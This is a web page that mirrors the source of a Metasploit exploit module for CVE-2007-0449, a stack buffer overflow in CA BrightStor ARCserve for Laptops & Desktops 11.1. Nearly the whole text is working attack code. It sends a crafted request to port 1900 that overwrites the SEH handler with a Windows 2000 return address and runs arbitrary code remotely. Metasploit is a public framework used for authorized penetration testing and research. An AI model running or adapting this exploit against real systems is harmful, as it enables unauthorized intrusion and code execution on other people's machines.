Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Path: blob/master/modules/exploits/windows/brightstor/lgserver.rb
Views: 11783
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = AverageRanking78include Msf::Exploit::Remote::Tcp9include Msf::Exploit::Remote::Seh1011def initialize(info = {})12super(update_info(info,13'Name' => 'CA BrightStor ARCserve for Laptops and Desktops LGServer Buffer Overflow',14'Description' => %q{15This module exploits a stack buffer overflow in Computer Associates BrightStor ARCserve Backup16for Laptops & Desktops 11.1. By sending a specially crafted request, an attacker could17overflow the buffer and execute arbitrary code.18},19'Author' => [ 'MC' ],20'License' => MSF_LICENSE,21'References' =>22[23[ 'CVE', '2007-0449' ],24[ 'OSVDB', '31593' ],25[ 'BID', '22342' ],26],27'Privileged' => true,28'DefaultOptions' =>29{30'EXITFUNC' => 'process',31},32'Payload' =>33{34'Space' => 600,35'BadChars' => "\x00\x0a\x0d\x5c\x5f\x2f\x2e",36'StackAdjustment' => -3500,37},38'Platform' => 'win',39'Targets' =>40[41[ 'Windows 2000 Pro English All', { 'Ret' => 0x75022ac4 } ],42],43'DisclosureDate' => '2007-01-31',44'DefaultTarget' => 0))4546register_options(47[48Opt::RPORT(1900)49])50end5152def exploit53connect5455filler = "0000016705" + rand_text_english(2322)56seh = generate_seh_payload(target.ret)57sploit = filler + seh + "\x58" * 0x41415859print_status("Trying target #{target.name}...")6061sock.put(sploit)62handler63disconnect64end65end666768